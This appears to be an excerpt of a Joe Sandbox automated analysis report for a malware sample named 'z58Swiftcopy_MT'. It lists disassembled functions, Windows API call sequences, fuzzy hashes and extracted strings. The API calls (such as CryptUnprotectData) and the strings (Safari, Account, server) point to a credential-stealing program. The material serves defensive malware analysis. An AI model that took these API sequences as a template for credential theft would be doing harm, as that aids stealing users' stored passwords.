                                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                                      • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,762CDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                      • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                      • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
